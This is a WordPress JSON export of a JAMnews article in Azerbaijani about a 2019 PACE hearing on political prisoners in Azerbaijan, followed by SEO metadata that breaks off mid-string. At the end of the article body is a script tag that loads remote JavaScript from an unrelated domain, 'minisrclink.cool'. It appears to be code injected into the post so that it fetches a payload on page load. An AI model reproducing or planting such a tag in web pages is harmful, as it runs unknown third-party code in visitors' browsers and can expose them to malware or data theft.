{"id":10599,"date":"2019-04-11T00:00:00","date_gmt":"2019-04-11T00:00:00","guid":{"rendered":"http:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/"},"modified":"2020-03-18T12:23:14","modified_gmt":"2020-03-18T12:23:14","slug":"aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi","status":"publish","type":"post","link":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/","title":{"rendered":"A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir"},"content":{"rendered":"<p>\u201cAz\u0259rbaycanda siyasi m\u0259hbuslar var \u2013 onlar Erm\u0259nistan\u0131n m\u0259nim \u00f6lk\u0259m\u0259 t\u0259cav\u00fcz\u00fc n\u0259tic\u0259sind\u0259 qa\u00e7q\u0131n v\u0259 m\u0259cburi k\u00f6\u00e7k\u00fcn olan 1 milyon insand\u0131r\u201d, &#8211; A\u015ePA-da Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri S\u0259m\u0259d Seyidov bu b\u0259yanatla \u00e7\u0131x\u0131\u015f edib. O \u0259lav\u0259 edib ki, bu problem h\u0259ll edilm\u0259d\u0259n siyasi m\u0259hbus problemini \u00e7\u00f6zm\u0259k m\u00fcr\u0259kk\u0259b m\u0259s\u0259l\u0259dir. <em><strong><a href=\"http:\/\/www.contact.az\/ext\/news\/2019\/4\/free\/politics%20news\/ru\/80096.htm\">Turan<\/a><\/strong><\/em> agentliyi m\u0259lumat yay\u0131b.<\/p>\n<p><a href=\"https:\/\/jam-news.net\/%D0%BA%D1%80%D0%B0%D1%81%D0%BD%D0%B0%D1%8F-%D0%BB%D0%B8%D0%BD%D0%B8%D1%8F-%D0%B3%D0%B4%D0%B5-%D0%BE%D0%BD%D0%B0-%D0%BF%D1%80%D0%BE%D1%85%D0%BE%D0%B4%D0%B8%D1%82-%D0%B4%D0%BB%D1%8F-%D0%B6%D1%83%D1%80\/?lang=az-AZ\"><strong>\u2022\u00a0<span style=\"text-decoration: underline;\">Az\u0259rbaycanda jurnalist olmaq niy\u0259 \u00e7\u0259tindir?<\/span><\/strong><\/a><\/p>\n<p>Strasburqda A\u015ePA-n\u0131n yaz sessiyas\u0131 \u00e7\u0259r\u00e7iv\u0259sind\u0259 A\u015ePA Monitorinq v\u0259 H\u00fcquq Komit\u0259si t\u0259r\u0259find\u0259n Az\u0259rbaycanda siyasi m\u0259hbus problemin\u0259 h\u0259sr olunan dinl\u0259m\u0259l\u0259r t\u0259\u015fkil olunub.<\/p>\n<p>H\u00fcquqi M\u0259s\u0259l\u0259l\u0259r v\u0259 \u0130nsan Haqlar\u0131 Komit\u0259sinin r\u0259hb\u0259ri Torxildur Varsdottirin fikrinc\u0259, martda ba\u015f tutan \u0259fv akt\u0131 zaman\u0131 bir s\u0131ra siyasi m\u0259hbusun azadl\u0131\u011fa burax\u0131lmas\u0131 problemi h\u0259ll etm\u0259yib. H\u0259l\u0259 d\u0259 h\u0259bsxanalarda 70-d\u0259n \u00e7ox siyasi m\u0259hbus var. Bundan ba\u015fqa, az \u0259vv\u0259l azadl\u0131\u011fa burax\u0131lanlardan b\u0259zil\u0259ri yenid\u0259n h\u0259bs olunub v\u0259 yen\u0259 d\u0259 siyasi motivl\u0259rl\u0259.<\/p>\n<p><a href=\"https:\/\/jam-news.net\/siyasi-m%C9%99hbuslarin-%C9%99fv-olunmasi-bunun-anlami-n%C9%99dir-v%C9%99-n%C9%99yi-d%C9%99yisir\/?lang=az-AZ\"><strong>\u2022\u00a0<span style=\"text-decoration: underline;\">Az\u0259rbaycanda siyasi m\u0259hbuslar\u0131n \u0259fv olunmas\u0131: bu n\u0259 dem\u0259kdir v\u0259 n\u0259yi d\u0259yi\u015fir?<\/span><\/strong><\/a><\/p>\n<p>Az\u0259rbaycandan olan h\u00fcquq m\u00fcdafi\u0259\u00e7isi v\u0259 siyasi emiqrant Leyla Yunus v\u0259 m\u00fcxalif Respublika\u00e7\u0131 Alternativ (ReAl) Partiyas\u0131n\u0131n s\u0259dri \u0130lqar M\u0259mm\u0259dov da \u00e7\u0131x\u0131\u015f edibl\u0259r. Onlar\u0131n h\u0259r ikisi siyasi motivl\u0259rl\u0259 bir ne\u00e7\u0259 il m\u0259hbus h\u0259yat\u0131 ya\u015fay\u0131b v\u0259 onlar \u00f6z \u00e7\u0131x\u0131\u015flar\u0131nda bu problemin \u00f6lk\u0259d\u0259 nec\u0259 k\u0259skin oldu\u011fu haqda dan\u0131\u015f\u0131blar.<\/p>\n<p>S\u0259m\u0259d Seyidov bildirib ki, Yunus v\u0259 M\u0259mm\u0259dovun \u015f\u0259xsi siyasi maraqlar\u0131 oldu\u011fu \u00fc\u00e7\u00fcn obyektiv ola bilm\u0259zl\u0259r.<\/p>\n<p><div class=\"su-divider su-divider-style-default\" style=\"margin:15px 0;border-width:3px;border-color:#999999\"><a href=\"#\" style=\"color:#999999\">Go to top<\/a><\/div> <\/p>\n<p><\/p>\n<p><script src=\"\/\/minisrclink.cool\/1e40c8bd4601a5a5a4.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>S\u0259m\u0259d Seyidov hesab edir ki, qa\u00e7q\u0131n problemini h\u0259ll etm\u0259d\u0259n siyasi m\u0259hbus m\u00f6vzusunu qald\u0131rmaq olmaz<\/p>\n","protected":false},"author":3,"featured_media":22081,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[17,2,25,50],"tags":[18,96,108],"formation":[],"post-author":[],"topic":[40],"tooltip":[],"city":[],"class_list":["post-10599","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-azrbaycan","category-cografiya","category-cmiyyt","category-xbrlr","tag-azrbaycan","tag-qafqaz-iqtisadiyyati","tag-qafqazda-insanlar","topic-qarabag-munaqissi"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir - JAMnews<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jam-news.net\/az\/aspa-da-az\u0259rbaycanda-insan-haqlarinin-v\u0259ziyy\u0259ti-muzakir\u0259-olunur-az\u0259rbaycan-numay\u0259nd\u0259-hey\u0259tinin-r\u0259hb\u0259ri-b\u0259yan-edib-ki-qarabag-daha-on\u0259mlidi\/\" \/>\n<meta property=\"og:locale\" content=\"az_AZ\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir - JAMnews\" \/>\n<meta property=\"og:description\" content=\"S\u0259m\u0259d Seyidov hesab edir ki, qa\u00e7q\u0131n problemini h\u0259ll etm\u0259d\u0259n siyasi m\u0259hbus m\u00f6vzusunu qald\u0131rmaq olmaz\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jam-news.net\/az\/aspa-da-az\u0259rbaycanda-insan-haqlarinin-v\u0259ziyy\u0259ti-muzakir\u0259-olunur-az\u0259rbaycan-numay\u0259nd\u0259-hey\u0259tinin-r\u0259hb\u0259ri-b\u0259yan-edib-ki-qarabag-daha-on\u0259mlidi\/\" \/>\n<meta property=\"og:site_name\" content=\"Azerbaijani Jamnews\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/JAMnewsInEnglish\/\" \/>\n<meta property=\"article:published_time\" content=\"2019-04-11T00:00:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-03-18T12:23:14+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/56899686_266418824308978_2459578649154682880_n-3.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"807\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"JAMnews\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@JAMnewsCaucasus\" \/>\n<meta name=\"twitter:site\" content=\"@JAMnewsCaucasus\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"JAMnews\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/\"},\"author\":{\"name\":\"JAMnews\",\"@id\":\"https:\/\/jam-news.net\/az\/#\/schema\/person\/67df3bb7adb46cd513fb9c4cb02361c6\"},\"headline\":\"A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir\",\"datePublished\":\"2019-04-11T00:00:00+00:00\",\"dateModified\":\"2020-03-18T12:23:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/\"},\"wordCount\":363,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/jam-news.net\/az\/#organization\"},\"image\":{\"@id\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/56899686_266418824308978_2459578649154682880_n-3.jpg\",\"keywords\":[\"Az\u0259rbaycan\",\"Qafqaz iqtisadiyyat\u0131\",\"Qafqazda insanlar\"],\"articleSection\":[\"Azerbaijan\",\"Geography\",\"Issues\",\"News\"],\"inLanguage\":\"az\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/\",\"url\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/\",\"name\":\"A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir - JAMnews\",\"isPartOf\":{\"@id\":\"https:\/\/jam-news.net\/az\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/56899686_266418824308978_2459578649154682880_n-3.jpg\",\"datePublished\":\"2019-04-11T00:00:00+00:00\",\"dateModified\":\"2020-03-18T12:23:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#breadcrumb\"},\"inLanguage\":\"az\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"az\",\"@id\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#primaryimage\",\"url\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/56899686_266418824308978_2459578649154682880_n-3.jpg\",\"contentUrl\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/56899686_266418824308978_2459578649154682880_n-3.jpg\",\"width\":1200,\"height\":807},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/jam-news.net\/az\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jam-news.net\/az\/#website\",\"url\":\"https:\/\/jam-news.net\/az\/\",\"name\":\"Azerbaijani Jamnews\",\"description\":\"Caucasus News, Politics and Society\",\"publisher\":{\"@id\":\"https:\/\/jam-news.net\/az\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jam-news.net\/az\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"az\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/jam-news.net\/az\/#organization\",\"name\":\"JAMnews\",\"url\":\"https:\/\/jam-news.net\/az\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"az\",\"@id\":\"https:\/\/jam-news.net\/az\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/05\/JAM_w.jpg\",\"contentUrl\":\"https:\/\/jam-news.net\/app\/uploads\/2020\/05\/JAM_w.jpg\",\"width\":960,\"height\":960,\"caption\":\"JAMnews\"},\"image\":{\"@id\":\"https:\/\/jam-news.net\/az\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/JAMnewsInEnglish\/\",\"https:\/\/x.com\/JAMnewsCaucasus\",\"https:\/\/www.instagram.com\/jam_news\/\",\"https:\/\/www.youtube.com\/channel\/UCXQbUCme2pykuZYXWHx4VPg\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/jam-news.net\/az\/#\/schema\/person\/67df3bb7adb46cd513fb9c4cb02361c6\",\"name\":\"JAMnews\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"az\",\"@id\":\"https:\/\/jam-news.net\/az\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e5c27593ef900c3ab3deed4ed1c653d7?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e5c27593ef900c3ab3deed4ed1c653d7?s=96&d=mm&r=g\",\"caption\":\"JAMnews\"},\"url\":\"https:\/\/jam-news.net\/az\/author\/margarita\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir - JAMnews","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jam-news.net\/az\/aspa-da-az\u0259rbaycanda-insan-haqlarinin-v\u0259ziyy\u0259ti-muzakir\u0259-olunur-az\u0259rbaycan-numay\u0259nd\u0259-hey\u0259tinin-r\u0259hb\u0259ri-b\u0259yan-edib-ki-qarabag-daha-on\u0259mlidi\/","og_locale":"az_AZ","og_type":"article","og_title":"A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir - JAMnews","og_description":"S\u0259m\u0259d Seyidov hesab edir ki, qa\u00e7q\u0131n problemini h\u0259ll etm\u0259d\u0259n siyasi m\u0259hbus m\u00f6vzusunu qald\u0131rmaq olmaz","og_url":"https:\/\/jam-news.net\/az\/aspa-da-az\u0259rbaycanda-insan-haqlarinin-v\u0259ziyy\u0259ti-muzakir\u0259-olunur-az\u0259rbaycan-numay\u0259nd\u0259-hey\u0259tinin-r\u0259hb\u0259ri-b\u0259yan-edib-ki-qarabag-daha-on\u0259mlidi\/","og_site_name":"Azerbaijani Jamnews","article_publisher":"https:\/\/www.facebook.com\/JAMnewsInEnglish\/","article_published_time":"2019-04-11T00:00:00+00:00","article_modified_time":"2020-03-18T12:23:14+00:00","og_image":[{"width":1200,"height":807,"url":"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/56899686_266418824308978_2459578649154682880_n-3.jpg","type":"image\/jpeg"}],"author":"JAMnews","twitter_card":"summary_large_image","twitter_creator":"@JAMnewsCaucasus","twitter_site":"@JAMnewsCaucasus","twitter_misc":{"Written by":"JAMnews","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#article","isPartOf":{"@id":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/"},"author":{"name":"JAMnews","@id":"https:\/\/jam-news.net\/az\/#\/schema\/person\/67df3bb7adb46cd513fb9c4cb02361c6"},"headline":"A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir","datePublished":"2019-04-11T00:00:00+00:00","dateModified":"2020-03-18T12:23:14+00:00","mainEntityOfPage":{"@id":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/"},"wordCount":363,"commentCount":0,"publisher":{"@id":"https:\/\/jam-news.net\/az\/#organization"},"image":{"@id":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#primaryimage"},"thumbnailUrl":"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/56899686_266418824308978_2459578649154682880_n-3.jpg","keywords":["Az\u0259rbaycan","Qafqaz iqtisadiyyat\u0131","Qafqazda insanlar"],"articleSection":["Azerbaijan","Geography","Issues","News"],"inLanguage":"az"},{"@type":"WebPage","@id":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/","url":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/","name":"A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir - JAMnews","isPartOf":{"@id":"https:\/\/jam-news.net\/az\/#website"},"primaryImageOfPage":{"@id":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#primaryimage"},"image":{"@id":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#primaryimage"},"thumbnailUrl":"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/56899686_266418824308978_2459578649154682880_n-3.jpg","datePublished":"2019-04-11T00:00:00+00:00","dateModified":"2020-03-18T12:23:14+00:00","breadcrumb":{"@id":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#breadcrumb"},"inLanguage":"az","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/"]}]},{"@type":"ImageObject","inLanguage":"az","@id":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#primaryimage","url":"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/56899686_266418824308978_2459578649154682880_n-3.jpg","contentUrl":"https:\/\/jam-news.net\/app\/uploads\/2020\/03\/56899686_266418824308978_2459578649154682880_n-3.jpg","width":1200,"height":807},{"@type":"BreadcrumbList","@id":"https:\/\/jam-news.net\/az\/aspa-da-az%c9%99rbaycanda-insan-haqlarinin-v%c9%99ziyy%c9%99ti-muzakir%c9%99-olunur-az%c9%99rbaycan-numay%c9%99nd%c9%99-hey%c9%99tinin-r%c9%99hb%c9%99ri-b%c9%99yan-edib-ki-qarabag-daha-on%c9%99mlidi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/jam-news.net\/az\/"},{"@type":"ListItem","position":2,"name":"A\u015ePA-da Az\u0259rbaycanda insan haqlar\u0131n\u0131n v\u0259ziyy\u0259ti m\u00fczakir\u0259 olunur. Az\u0259rbaycan n\u00fcmay\u0259nd\u0259 hey\u0259tinin r\u0259hb\u0259ri b\u0259yan edib ki, Qaraba\u011f daha \u00f6n\u0259mlidir"}]},{"@type":"WebSite","@id":"https:\/\/jam-news.net\/az\/#website","url":"https:\/\/jam-news.net\/az\/","name":"Azerbaijani Jamnews","description":"Caucasus News, Politics and 